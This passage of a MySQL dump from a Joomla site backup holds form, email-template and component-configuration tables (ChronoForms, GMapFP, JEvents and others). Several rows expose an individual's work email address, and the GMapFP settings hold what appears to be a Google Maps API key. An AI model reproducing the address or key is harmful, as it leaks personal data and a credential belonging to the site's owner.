text_28CHRONO_CONSTANT_EOLname = text_28CHRONO_CONSTANT_EOLclass = cf_inputboxCHRONO_CONSTANT_EOLrows = 3CHRONO_CONSTANT_EOLcols = 30CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Additional CommentsCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_button\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLvalue = SendCHRONO_CONSTANT_EOLname = button_20CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLreset = 0CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 0CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL','default',1,'','','','',''); /*!40000 ALTER TABLE `bak_fit_bss_chrono_contact` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_chrono_contact_elements` -- DROP TABLE IF EXISTS `bak_fit_bss_chrono_contact_elements`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_chrono_contact_elements` ( `id` int(11) NOT NULL auto_increment, `title` varchar(255) NOT NULL default '', `placeholder` varchar(255) NOT NULL default '', `desc` text NOT NULL, `code` longtext NOT NULL, `params` longtext NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_chrono_contact_elements` -- LOCK TABLES `bak_fit_bss_chrono_contact_elements` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_chrono_contact_elements` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_chrono_contact_elements` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_chrono_contact_emails` -- DROP TABLE IF EXISTS `bak_fit_bss_chrono_contact_emails`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_chrono_contact_emails` ( `emailid` int(11) NOT NULL auto_increment, `formid` int(11) NOT NULL default '0', `to` text NOT NULL, `dto` text NOT NULL, `subject` text NOT NULL, `dsubject` text NOT NULL, `cc` text NOT NULL, `dcc` text NOT NULL, `bcc` text NOT NULL, `dbcc` text NOT NULL, `fromname` text NOT NULL, `dfromname` text NOT NULL, `fromemail` text NOT NULL, `dfromemail` text NOT NULL, `replytoname` text NOT NULL, `dreplytoname` text NOT NULL, `replytoemail` text NOT NULL, `dreplytoemail` text NOT NULL, `enabled` tinyint(1) NOT NULL default '0', `params` longtext NOT NULL, `template` longtext NOT NULL, PRIMARY KEY (`emailid`) ) ENGINE=MyISAM AUTO_INCREMENT=51 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_chrono_contact_emails` -- LOCK TABLES `bak_fit_bss_chrono_contact_emails` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_chrono_contact_emails` DISABLE KEYS */; INSERT INTO `bak_fit_bss_chrono_contact_emails` VALUES (1,3,'admin@yoursite.com','','New contact form arrived','','','','','','Mywebsite.com','','admin@admin.com','','','','','',1,'recordip=1\nemailtype=html\nenabled=1\neditor=1\nenable_attachments=1','<p>Hello Admin,</p>\r\n<p>Some user has submitted a new message for you, the message submitted is:</p>\r\n<p>{message}</p>\r\n<p> </p>\r\n<p>the user\'s name is: {name}</p>'),(2,3,'','email','','subject','','','','','Mywebsite.com','','admin@admin.com','','','','','',1,'recordip=1\nemailtype=html\nenabled=1\neditor=1\nenable_attachments=1','<p>Hello {name},</p>\r\n<p><br />Thank you for contacting us, we will get back to you ASAP!</p>\r\n<p> </p>\r\n<p>MyWebsite.com staff</p>'),(6,5,'','email','','subject','','','','','Mywebsite.com','','admin@admin.com','','','','','',1,'recordip=1\nemailtype=html\nenabled=1\neditor=1\nenable_attachments=1','<p>Hello {name},</p>\r\n<p><br />Thank you for contacting us, we will get back to you ASAP!</p>\r\n<p> </p>\r\n<p>MyWebsite.com staff</p>'),(5,5,'admin@yoursite.com','','New contact form arrived','','','','','','Mywebsite.com','','admin@admin.com','','','','','',1,'recordip=1\nemailtype=html\nenabled=1\neditor=1\nenable_attachments=1','<p>Hello Admin,</p>\r\n<p>Some user has submitted a new message for you, the message submitted is:</p>\r\n<p>{message}</p>\r\n<p> </p>\r\n<p>the user\'s name is: {name}</p>'),(28,6,'ahmed.abulebdeh@builders-solutions.com','','test','','','','','','bss.com','','ahmed.abulebdeh@builders-solutions.com','','','','','',1,'recordip=1\nemailtype=html\nenabled=1\neditor=1\nenable_attachments=1','<p><strong>Member Name:*</strong> <br /> {text_0}<br /> <strong>Company Name:*</strong> <br /> {text_1}<br /> <strong>Job Title:*</strong> <br /> {text_2}<br /> <strong>Nature Of Business:*</strong> <br /> {text_3}<br /> <strong>City/Town:*</strong> <br /> {text_7}<br /> <strong>Country:*</strong> <br /> {text_4}<br /> <strong>E-Mail:*</strong> <br /> {text_10}</p>'),(44,7,'ahmed.abulebdeh@builders-solutions.com','','test','','','','','','bss.com','','ahmed.abulebdeh@builders-solutions.com','','','','','',1,'recordip=1\nemailtype=html\nenabled=1\neditor=1\nenable_attachments=1','<p><strong>Name:*</strong> <br />{text_17}<br /><strong>Phone:*</strong> <br />{text_16}<br /><strong>E-Mail:*</strong> <br />{text_15}</p>\r\n<p><br /><strong>Message:*</strong> <br />{text_13}</p>'),(23,8,'admin@yoursite.com','','New contact form arrived','','','','','','Mywebsite.com','','admin@admin.com','','','','','',1,'recordip=1\nemailtype=html\nenabled=1\neditor=1\nenable_attachments=1','<p>Hello Admin,</p>\r\n<p>Some user has submitted a new message for you, the message submitted is:</p>\r\n<p>{message}</p>\r\n<p> </p>\r\n<p>the user\'s name is: {name}</p>'),(24,8,'','email','','subject','','','','','Mywebsite.com','','admin@admin.com','','','','','',1,'recordip=1\nemailtype=html\nenabled=1\neditor=1\nenable_attachments=1','<p>Hello {name},</p>\r\n<p><br />Thank you for contacting us, we will get back to you ASAP!</p>\r\n<p> </p>\r\n<p>MyWebsite.com staff</p>'),(50,9,'ahmed.abulebdeh@builders-solutions.com','','','CAREERS ','','','','','bss.com','','','','','','','',1,'recordip=1\nemailtype=html\nenabled=1\neditor=1\nenable_attachments=1','<p><strong>Full Name *</strong> <br /> {fullname}<br /> <strong>Address</strong> <br /> {Address}<br /> <strong>City *</strong> <br /> {city}<br /> <strong>Zip Code</strong> <br /> {zipcode}<br /> <strong>Country *</strong> <br /> {country}<br /> <strong>Telephone</strong> <br /> {telephone}<br /> <strong>Cell *</strong> <br /> {cell}<br /> <strong>Email *</strong> <br /> {email}<br /> <strong>URL (if any)</strong> <br /> {url}<br /> <strong>Applied For *</strong> <br /> {select_15}<br /> <strong>if other, Please specify?</strong> <br /> {text_16}<br /> <strong>Years of Experience</strong> <br /> {text_17}<br /> <strong>Level of Education *</strong> <br /> {select_18}<br /> <strong>Field of Education *</strong> <br /> {text_21}<br /> <strong>Present Employment</strong> <br /> {text_23}<br /> <strong>Job Title</strong> <br /> {text_24}<br /> <strong>Current Salary Package</strong> <br /> {text_25}<br /> <strong>Expected Salary Package</strong> <br /> {text_22}<br /> <strong>Attach Resume along with recent Photograph *</strong> <br /> {file_26}<br /> <strong>Additional Comments</strong> <br /> {text_28}</p>'); /*!40000 ALTER TABLE `bak_fit_bss_chrono_contact_emails` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_chrono_contact_plugins` -- DROP TABLE IF EXISTS `bak_fit_bss_chrono_contact_plugins`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_chrono_contact_plugins` ( `id` int(11) NOT NULL auto_increment, `form_id` int(11) NOT NULL default '0', `name` varchar(255) NOT NULL default '', `event` varchar(255) NOT NULL default '', `params` longtext NOT NULL, `extra1` longtext NOT NULL, `extra2` longtext NOT NULL, `extra3` longtext NOT NULL, `extra4` longtext NOT NULL, `extra5` longtext NOT NULL, `extra6` longtext NOT NULL, `extra7` longtext NOT NULL, `extra8` longtext NOT NULL, `extra9` longtext NOT NULL, `extra10` longtext NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_chrono_contact_plugins` -- LOCK TABLES `bak_fit_bss_chrono_contact_plugins` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_chrono_contact_plugins` DISABLE KEYS */; INSERT INTO `bak_fit_bss_chrono_contact_plugins` VALUES (1,7,'cf_email_verification','ONLOADONSUBMIT','to=\nsubject=\nfromemail=\nfromname=\ndto=\ndsubject=\ndfromemail=\ndfromname=\nvtablename=--?--\nvflagfield=\nonsubmit=before_email','asd ada asd ad a d','','','','','','','','',''); /*!40000 ALTER TABLE `bak_fit_bss_chrono_contact_plugins` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_components` -- DROP TABLE IF EXISTS `bak_fit_bss_components`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_components` ( `id` int(11) NOT NULL auto_increment, `name` varchar(50) NOT NULL default '', `link` varchar(255) NOT NULL default '', `menuid` int(11) unsigned NOT NULL default '0', `parent` int(11) unsigned NOT NULL default '0', `admin_menu_link` varchar(255) NOT NULL default '', `admin_menu_alt` varchar(255) NOT NULL default '', `option` varchar(50) NOT NULL default '', `ordering` int(11) NOT NULL default '0', `admin_menu_img` varchar(255) NOT NULL default '', `iscore` tinyint(4) NOT NULL default '0', `params` text NOT NULL, `enabled` tinyint(4) NOT NULL default '1', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=192 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_components` -- LOCK TABLES `bak_fit_bss_components` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_components` DISABLE KEYS */; INSERT INTO `bak_fit_bss_components` VALUES (1,'Banners','',0,0,'','Banner Management','com_banners',0,'js/ThemeOffice/component.png',0,'track_impressions=0\ntrack_clicks=0\ntag_prefix=\n\n',1),(2,'Banners','',0,1,'option=com_banners','Active Banners','com_banners',1,'js/ThemeOffice/edit.png',0,'',1),(3,'Clients','',0,1,'option=com_banners&c=client','Manage Clients','com_banners',2,'js/ThemeOffice/categories.png',0,'',1),(4,'Web Links','option=com_weblinks',0,0,'','Manage Weblinks','com_weblinks',0,'js/ThemeOffice/component.png',0,'show_comp_description=1\ncomp_description=\nshow_link_hits=1\nshow_link_description=1\nshow_other_cats=1\nshow_headings=1\nshow_page_title=1\nlink_target=0\nlink_icons=\n\n',1),(5,'Links','',0,4,'option=com_weblinks','View existing weblinks','com_weblinks',1,'js/ThemeOffice/edit.png',0,'',1),(6,'Categories','',0,4,'option=com_categories§ion=com_weblinks','Manage weblink categories','',2,'js/ThemeOffice/categories.png',0,'',1),(7,'Contacts','option=com_contact',0,0,'','Edit contact details','com_contact',0,'js/ThemeOffice/component.png',1,'contact_icons=0\nicon_address=\nicon_email=\nicon_telephone=\nicon_fax=\nicon_misc=\nshow_headings=1\nshow_position=1\nshow_email=0\nshow_telephone=1\nshow_mobile=1\nshow_fax=1\nbannedEmail=\nbannedSubject=\nbannedText=\nsession=1\ncustomReply=0\n\n',1),(8,'Contacts','',0,7,'option=com_contact','Edit contact details','com_contact',0,'js/ThemeOffice/edit.png',1,'',1),(9,'Categories','',0,7,'option=com_categories§ion=com_contact_details','Manage contact categories','',2,'js/ThemeOffice/categories.png',1,'contact_icons=0\nicon_address=\nicon_email=\nicon_telephone=\nicon_fax=\nicon_misc=\nshow_headings=1\nshow_position=1\nshow_email=0\nshow_telephone=1\nshow_mobile=1\nshow_fax=1\nbannedEmail=\nbannedSubject=\nbannedText=\nsession=1\ncustomReply=0\n\n',1),(10,'Polls','option=com_poll',0,0,'option=com_poll','Manage Polls','com_poll',0,'js/ThemeOffice/component.png',0,'',1),(11,'News Feeds','option=com_newsfeeds',0,0,'','News Feeds Management','com_newsfeeds',0,'js/ThemeOffice/component.png',0,'',1),(12,'Feeds','',0,11,'option=com_newsfeeds','Manage News Feeds','com_newsfeeds',1,'js/ThemeOffice/edit.png',0,'show_headings=1\nshow_name=1\nshow_articles=1\nshow_link=1\nshow_cat_description=1\nshow_cat_items=1\nshow_feed_image=1\nshow_feed_description=1\nshow_item_description=1\nfeed_word_count=0\n\n',1),(13,'Categories','',0,11,'option=com_categories§ion=com_newsfeeds','Manage Categories','',2,'js/ThemeOffice/categories.png',0,'',1),(14,'User','option=com_user',0,0,'','','com_user',0,'',1,'',1),(15,'Search','option=com_search',0,0,'option=com_search','Search Statistics','com_search',0,'js/ThemeOffice/component.png',1,'enabled=0\n\n',1),(16,'Categories','',0,1,'option=com_categories§ion=com_banner','Categories','',3,'',1,'',1),(17,'Wrapper','option=com_wrapper',0,0,'','Wrapper','com_wrapper',0,'',1,'',1),(18,'Mail To','',0,0,'','','com_mailto',0,'',1,'',1),(19,'Media Manager','',0,0,'option=com_media','Media Manager','com_media',0,'',1,'upload_extensions=bmp,csv,doc,epg,gif,ico,jpg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,EPG,GIF,ICO,JPG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS\nupload_maxsize=10000000\nfile_path=images\nimage_path=images/stories\nrestrict_uploads=1\nallowed_media_usergroup=3\ncheck_mime=1\nimage_extensions=bmp,gif,jpg,png\nignore_extensions=\nupload_mime=image/jpeg,image/gif,image/png,image/bmp,application/x-shockwave-flash,application/msword,application/excel,application/pdf,application/powerpoint,text/plain,application/x-zip\nupload_mime_illegal=text/html\nenable_flash=0\n\n',1),(20,'Articles','option=com_content',0,0,'','','com_content',0,'',1,'show_noauth=0\nshow_title=1\nlink_titles=0\nshow_intro=1\nshow_section=0\nlink_section=0\nshow_category=0\nlink_category=0\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_item_navigation=0\nshow_readmore=1\nshow_vote=0\nshow_icons=1\nshow_pdf_icon=1\nshow_print_icon=1\nshow_email_icon=1\nshow_hits=1\nfeed_summary=0\nfilter_tags=\nfilter_attritbutes=\n\n',1),(21,'Configuration Manager','',0,0,'','Configuration','com_config',0,'',1,'',1),(22,'Installation Manager','',0,0,'','Installer','com_installer',0,'',1,'',1),(23,'Language Manager','',0,0,'','Languages','com_languages',0,'',1,'site=en-GB\n\n',1),(24,'Mass mail','',0,0,'','Mass Mail','com_massmail',0,'',1,'mailSubjectPrefix=\nmailBodySuffix=\n\n',1),(25,'Menu Editor','',0,0,'','Menu Editor','com_menus',0,'',1,'',1),(27,'Messaging','',0,0,'','Messages','com_messages',0,'',1,'',1),(28,'Modules Manager','',0,0,'','Modules','com_modules',0,'',1,'',1),(29,'Plugin Manager','',0,0,'','Plugins','com_plugins',0,'',1,'',1),(30,'Template Manager','',0,0,'','Templates','com_templates',0,'',1,'',1),(31,'User Manager','',0,0,'','Users','com_users',0,'',1,'allowUserRegistration=1\nnew_usertype=Registered\nuseractivation=1\nfrontend_userparams=1\n\n',1),(32,'Cache Manager','',0,0,'','Cache','com_cache',0,'',1,'',1),(33,'Control Panel','',0,0,'','Control Panel','com_cpanel',0,'',1,'',1),(34,'Joom!Fish','option=com_joomfish',0,0,'option=com_joomfish','Joom!Fish','com_joomfish',0,'components/com_joomfish/assets/images/icon-16-joomfish.png',0,'noTranslation=2\ndefaultText=\noverwriteGlobalConfig=1\nstorageOfOriginal=md5\nfrontEndPublish=1\nfrontEndPreview=1\nshowPanelNews=1\nshowPanelUnpublished=1\nshowPanelState=1\ncopyparams=1\ntranscaching=0\ncachelife=180\nqacaching=1\nqalogging=0\n',1),(35,'Control Panel','',0,34,'option=com_joomfish','Control Panel','com_joomfish',0,'components/com_joomfish/assets/images/icon-16-cpanel.png',0,'',1),(36,'Translation','',0,34,'option=com_joomfish&task=translate.overview','Translation','com_joomfish',1,'components/com_joomfish/assets/images/icon-16-translation.png',0,'',1),(37,'Orphan Translations','',0,34,'option=com_joomfish&task=translate.orphans','Orphan Translations','com_joomfish',2,'components/com_joomfish/assets/images/icon-16-orphan.png',0,'',1),(38,'Manage Translations','',0,34,'option=com_joomfish&task=manage.overview','Manage Translations','com_joomfish',3,'components/com_joomfish/assets/images/icon-16-manage.png',0,'',1),(39,'Statistics','',0,34,'option=com_joomfish&task=statistics.overview','Statistics','com_joomfish',4,'components/com_joomfish/assets/images/icon-16-statistics.png',0,'',1),(40,'','',0,34,'option=com_joomfish','','com_joomfish',5,'components/com_joomfish/assets/images/icon-10-blank.png',0,'',1),(41,'Languages','',0,34,'option=com_joomfish&task=languages.show','Languages','com_joomfish',6,'components/com_joomfish/assets/images/icon-16-language.png',0,'',1),(42,'Content elements','',0,34,'option=com_joomfish&task=elements.show','Content elements','com_joomfish',7,'components/com_joomfish/assets/images/icon-16-extension.png',0,'',1),(43,'Plugins','',0,34,'option=com_joomfish&task=plugin.show','Plugins','com_joomfish',8,'components/com_joomfish/assets/images/icon-16-plugin.png',0,'',1),(44,'','',0,34,'option=com_joomfish','','com_joomfish',9,'components/com_joomfish/assets/images/icon-10-blank.png',0,'',1),(45,'Help','',0,34,'option=com_joomfish&task=help.show','Help','com_joomfish',10,'components/com_joomfish/assets/images/icon-16-help.png',0,'',1),(46,'Phoca Download','option=com_phocadownload',0,0,'option=com_phocadownload','Phoca Download','com_phocadownload',0,'components/com_phocadownload/assets/images/icon-16-pdl-menu.png',0,'',1),(47,'Control Panel','',0,46,'option=com_phocadownload','Control Panel','com_phocadownload',0,'components/com_phocadownload/assets/images/icon-16-pdl-control-panel.png',0,'',1),(48,'Files','',0,46,'option=com_phocadownload&view=phocadownloads','Files','com_phocadownload',1,'components/com_phocadownload/assets/images/icon-16-pdl-menu-files.png',0,'',1),(49,'Sections','',0,46,'option=com_phocadownload&view=phocadownloadsecs','Sections','com_phocadownload',2,'components/com_phocadownload/assets/images/icon-16-pdl-menu-section.png',0,'',1),(50,'Categories','',0,46,'option=com_phocadownload&view=phocadownloadcats','Categories','com_phocadownload',3,'components/com_phocadownload/assets/images/icon-16-pdl-menu-category.png',0,'',1),(51,'Licenses','',0,46,'option=com_phocadownload&view=phocadownloadlics','Licenses','com_phocadownload',4,'components/com_phocadownload/assets/images/icon-16-pdl-menu-lic.png',0,'',1),(52,'Settings','',0,46,'option=com_phocadownload&view=phocadownloadset','Settings','com_phocadownload',5,'components/com_phocadownload/assets/images/icon-16-pdl-menu-settings.png',0,'',1),(53,'Statistics','',0,46,'option=com_phocadownload&view=phocadownloadstat','Statistics','com_phocadownload',6,'components/com_phocadownload/assets/images/icon-16-pdl-menu-stat.png',0,'',1),(54,'PHOCADOWNLOAD_USERS','',0,46,'option=com_phocadownload&view=phocadownloadusers','PHOCADOWNLOAD_USERS','com_phocadownload',7,'components/com_phocadownload/assets/images/icon-16-pdl-menu-users.png',0,'',1),(55,'Info','',0,46,'option=com_phocadownload&view=phocadownloadinfo','Info','com_phocadownload',8,'components/com_phocadownload/assets/images/icon-16-pdl-menu-info.png',0,'',1),(141,'Phoca Gallery','option=com_phocagallery',0,0,'option=com_phocagallery','Phoca Gallery','com_phocagallery',0,'components/com_phocagallery/assets/images/icon-16-pg-menu.png',0,'',1),(142,'Control Panel','',0,141,'option=com_phocagallery','Control Panel','com_phocagallery',0,'components/com_phocagallery/assets/images/icon-16-pg-control-panel.png',0,'',1),(143,'Images','',0,141,'option=com_phocagallery&view=phocagallerys','Images','com_phocagallery',1,'components/com_phocagallery/assets/images/icon-16-pg-menu-gal.png',0,'',1),(144,'Categories','',0,141,'option=com_phocagallery&view=phocagallerycs','Categories','com_phocagallery',2,'components/com_phocagallery/assets/images/icon-16-pg-menu-cat.png',0,'',1),(145,'Themes','',0,141,'option=com_phocagallery&view=phocagalleryt','Themes','com_phocagallery',3,'components/com_phocagallery/assets/images/icon-16-pg-menu-theme.png',0,'',1),(146,'Category Rating','',0,141,'option=com_phocagallery&view=phocagalleryra','Category Rating','com_phocagallery',4,'components/com_phocagallery/assets/images/icon-16-pg-menu-vote.png',0,'',1),(147,'Image Rating','',0,141,'option=com_phocagallery&view=phocagalleryraimg','Image Rating','com_phocagallery',5,'components/com_phocagallery/assets/images/icon-16-pg-menu-vote-img.png',0,'',1),(148,'Category Comments','',0,141,'option=com_phocagallery&view=phocagallerycos','Category Comments','com_phocagallery',6,'components/com_phocagallery/assets/images/icon-16-pg-menu-comment.png',0,'',1),(149,'Image Comments','',0,141,'option=com_phocagallery&view=phocagallerycoimgs','Image Comments','com_phocagallery',7,'components/com_phocagallery/assets/images/icon-16-pg-menu-comment-img.png',0,'',1),(150,'Users','',0,141,'option=com_phocagallery&view=phocagalleryusers','Users','com_phocagallery',8,'components/com_phocagallery/assets/images/icon-16-pg-menu-users.png',0,'',1),(68,'JCE','option=com_jce',0,0,'option=com_jce','JCE','com_jce',0,'components/com_jce/img/logo.png',0,'\npackage=1',1),(69,'JCE MENU CPANEL','',0,68,'option=com_jce','JCE MENU CPANEL','com_jce',0,'templates/khepri/images/menu/icon-16-cpanel.png',0,'',1),(70,'JCE MENU CONFIG','',0,68,'option=com_jce&type=config','JCE MENU CONFIG','com_jce',1,'templates/khepri/images/menu/icon-16-config.png',0,'',1),(71,'JCE MENU GROUPS','',0,68,'option=com_jce&type=group','JCE MENU GROUPS','com_jce',2,'templates/khepri/images/menu/icon-16-user.png',0,'',1),(72,'JCE MENU PLUGINS','',0,68,'option=com_jce&type=plugin','JCE MENU PLUGINS','com_jce',3,'templates/khepri/images/menu/icon-16-plugin.png',0,'',1),(73,'JCE MENU INSTALL','',0,68,'option=com_jce&type=install','JCE MENU INSTALL','com_jce',4,'templates/khepri/images/menu/icon-16-install.png',0,'',1),(74,'Chrono Forms','option=com_chronocontact',0,0,'option=com_chronocontact','Chrono Forms','com_chronocontact',0,'components/com_chronocontact/CF.png',0,'showtipoftheday=0\nlicensecode=\ncurlproxy=\n\n',1),(75,'Forms Management','',0,74,'option=com_chronocontact&act=all','Forms Management','com_chronocontact',0,'js/ThemeOffice/component.png',0,'',1),(76,'Form Wizard','',0,74,'option=com_chronocontact&task=form_wizard','Form Wizard','com_chronocontact',1,'js/ThemeOffice/component.png',0,'',1),(77,'Wizard Custom Elements','',0,74,'option=com_chronocontact&task=wizard_elements','Wizard Custom Elements','com_chronocontact',2,'js/ThemeOffice/component.png',0,'',1),(78,'Menu Creator','',0,74,'option=com_chronocontact&task=menu_creator','Menu Creator','com_chronocontact',3,'js/ThemeOffice/component.png',0,'',1),(79,'Menu Remover','',0,74,'option=com_chronocontact&task=menu_remover','Menu Remover','com_chronocontact',4,'js/ThemeOffice/component.png',0,'',1),(80,'Upgrade SQL and Load Demo Form','',0,74,'option=com_chronocontact&task=doupgrade','Upgrade SQL and Load Demo Form','com_chronocontact',5,'js/ThemeOffice/component.png',0,'',1),(81,'Validate Installation','',0,74,'option=com_chronocontact&task=validatelicense','Validate Installation','com_chronocontact',6,'js/ThemeOffice/component.png',0,'',1),(82,'Vinaora Visitors Counter','option=com_vvisit_counter',0,0,'option=com_vvisit_counter','Vinaora Visitors Counter','com_vvisit_counter',0,'js/ThemeOffice/component.png',0,'',1),(94,'HTML MAP','option=com_htmlmap',0,0,'option=com_htmlmap','HTML MAP','com_htmlmap',0,'../includes/js/ThemeOffice/globe4.png',0,'css_class=htmlmap_left\n\n',1),(96,'GMapFP','option=com_gmapfp',0,0,'option=com_gmapfp','GMapFP','com_gmapfp',0,'components/com_gmapfp/images/logo_gmapfp.png',0,'gmapfp_key=ABQIAAAA2kN4HimvtasvG_LAdvLnDhRkRqwoQVnugqLpCBJDLu_xiwekCBR8GFxauyzO_spSRSccHVkTy-fc5w\ngmapfp_multi_url=http://jepa.org.jo\ngmapfp_multi_key=\ngmapfp_URI_type=0\ngmapfp_height=500\ngmapfp_width=500\ngmapfp_auto=1\ngmapfp_centre_lat=31.386797989995415\ngmapfp_centre_lng=36.37253522870003\ngmapfp_auto_zoom=1\ngmapfp_zoom=3\ngmapfp_zoom_lightbox_carte=0\ngmapfp_zoom_lightbox_imprimer=0\ngmapfp_normal=1\ngmapfp_satellite=1\ngmapfp_hybrid=1\ngmapfp_physic=1\ngmapfp_earth=1\ngmapfp_choix_affichage_carte=1\ngmapfp_mapcontrol=1\ngmapfp_scalecontrol=1\ngmapfp_mousewheel=1\ngmapfp_zzoom=1\ngmapfp_plus_info=1\ngmapfp_url_wiki=org.wikipedia.fr\ngmapfp_eventcontrol=1\ngmapfp_width_bulle_GMapFP=400\ngmapfp_taille_bulle_cesure=200\ngmapfp_html_bubble=0\ngmapfp_plus_detail=1\ntarget=0\ngmapfp_hauteur_lightbox=400\ngmapfp_largeur_lightbox=700\ngmapfp_itineraire=1\ngmapfp_filtre=1\ngmapfp_msg=1\ngmapfp_afficher_horaires_prix=1\ngmapfp_afficher_intro_italique=1\ngmapfp_chemin_img=/images/stories/gmapfp/\ngmapfp_hauteur_img=100\ngmapfp_geoXML=\ngmapfp_jcomments=1\ngmapfp_news=1\n\n',1),(97,'Accueil','',0,96,'option=com_gmapfp','Accueil','com_gmapfp',0,'js/ThemeOffice/cpanel.png',0,'',1),(98,'Lieux','',0,96,'option=com_gmapfp&controller=gmapfp&task=view','Lieux','com_gmapfp',1,'js/ThemeOffice/menumgr.png',0,'',1),(99,'Marqueurs','',0,96,'option=com_gmapfp&controller=marqueurs&task=view','Marqueurs','com_gmapfp',2,'components/com_gmapfp/images/marqueur.png',0,'',1),(100,'Categories','',0,96,'option=com_categories§ion=com_gmapfp','Categories','com_gmapfp',3,'js/ThemeOffice/category.png',0,'',1),(101,'Groupes_de_categories','',0,96,'option=com_gmapfp&controller=groupes&task=view','Groupes_de_categories','com_gmapfp',4,'js/ThemeOffice/section.png',0,'',1),(102,'Personnalisation','',0,96,'option=com_gmapfp&controller=personnalisations&task=view','Personnalisation','com_gmapfp',5,'js/ThemeOffice/component.png',0,'',1),(103,'CSS','',0,96,'option=com_gmapfp&controller=css&task=view','CSS','com_gmapfp',6,'js/ThemeOffice/content.png',0,'',1),(104,'Googlemap','option=com_google',0,0,'option=com_google','Googlemap','com_google',0,'js/ThemeOffice/component.png',0,'',1),(105,'Manage Destinations','',0,104,'option=com_google','Manage Destinations','com_google',0,'js/ThemeOffice/component.png',0,'',1),(106,'Manage Categories','',0,104,'option=com_google&task=categories&controller=category','Manage Categories','com_google',1,'js/ThemeOffice/component.png',0,'',1),(107,'Css','',0,104,'option=com_google&task=css&controller=general','Css','com_google',2,'js/ThemeOffice/component.png',0,'',1),(108,'Configuration','',0,104,'option=com_google&task=configuration&controller=general','Configuration','com_google',3,'js/ThemeOffice/component.png',0,'',1),(109,'Information','',0,104,'option=com_google&task=info&controller=general','Information','com_google',4,'js/ThemeOffice/component.png',0,'',1),(95,'Fade Gallery','option=com_fadegallery',0,0,'option=com_fadegallery','Fade Gallery','com_fadegallery',0,'js/ThemeOffice/component.png',0,'',1),(164,'Subscriptions','',0,160,'option=com_jcomments&task=subscriptions','Subscriptions','com_jcomments',3,'components/com_jcomments/assets/subscriptions16x16.png',0,'',1),(151,'Info','',0,141,'option=com_phocagallery&view=phocagalleryin','Info','com_phocagallery',9,'components/com_phocagallery/assets/images/icon-16-pg-menu-info.png',0,'',1),(152,'JEvents MVC','option=com_jevents',0,0,'option=com_jevents','JEvents MVC','com_jevents',0,'js/ThemeOffice/component.png',0,'com_calViewName=default\ncom_dateformat=0\ncom_calUseStdTime=0\ncom_blockRobots=1\nrobotprior=-1 month\nrobotpost=+1 month\ncom_cache=0\ncom_calHeadline=comp\ncom_calUseIconic=1\ncom_navbarcolor=green\ncom_earliestyear=2000\ncom_latestyear=2015\ncom_starday=0\ncom_print_icon_view=1\ncom_email_icon_view=1\ncom_hideshowbycats=1\ninstalllayouts=0\ncom_copyright=1\nlargeDataSetLimit=100000\nshowPanelNews=1\nhideMigration=0\nicaltimezonelive=Asia/Amman\njevadmin=62\nauthorisedonly=0\njevcreator_level=19\njeveditor_level=20\njevpublish_level=21\njevpublishown=0\nicaltimezone=\nicalkey=secret phrase\nshowicalicon=0\ndisableicalexport=0\nicalmultiday=0\nicalmultiday24h=0\neditpopup=0\ndisablerepeats=0\npopupw=800\npopuph=500\ndefaultcat=0\nforcepopupcalendar=1\ncom_calForceCatColorEventForm=2\ncom_single_pane_edit=0\ntimebeforedescription=0\ncom_show_editor_buttons=0\ncom_editor_button_exceptions=pagebreak,readmore\ncom_notifyboth=0\ncom_notifyallevents=0\nshowpriority=0\nmultiday=1\ncom_byview=1\ncom_mailview=1\ncom_hitsview=1\ncom_repeatview=1\ncom_calCutTitle=15\ncom_calMaxDisplay=15\ncom_calDisplayStarttime=1\ncom_enableToolTip=1\ntooltiptype=joomla\ncom_calTTBackground=1\ncom_calTTPosX=LEFT\ncom_calTTPosY=BELOW\ncom_calTTShadow=0\ncom_calTTShadowX=0\ncom_calTTShadowY=0\ncom_calEventListRowsPpg=10\nshowyearpast=1\ncom_showrepeats=1\nshowyeardate=0\ncom_rss_cache=1\ncom_rss_cache_time=3600\ncom_rss_count=5\ncom_rss_live_bookmarks=1\ncom_rss_modid=0\ncom_rss_title=JEvents Syndication for Joomla\ncom_rss_description=Powered by 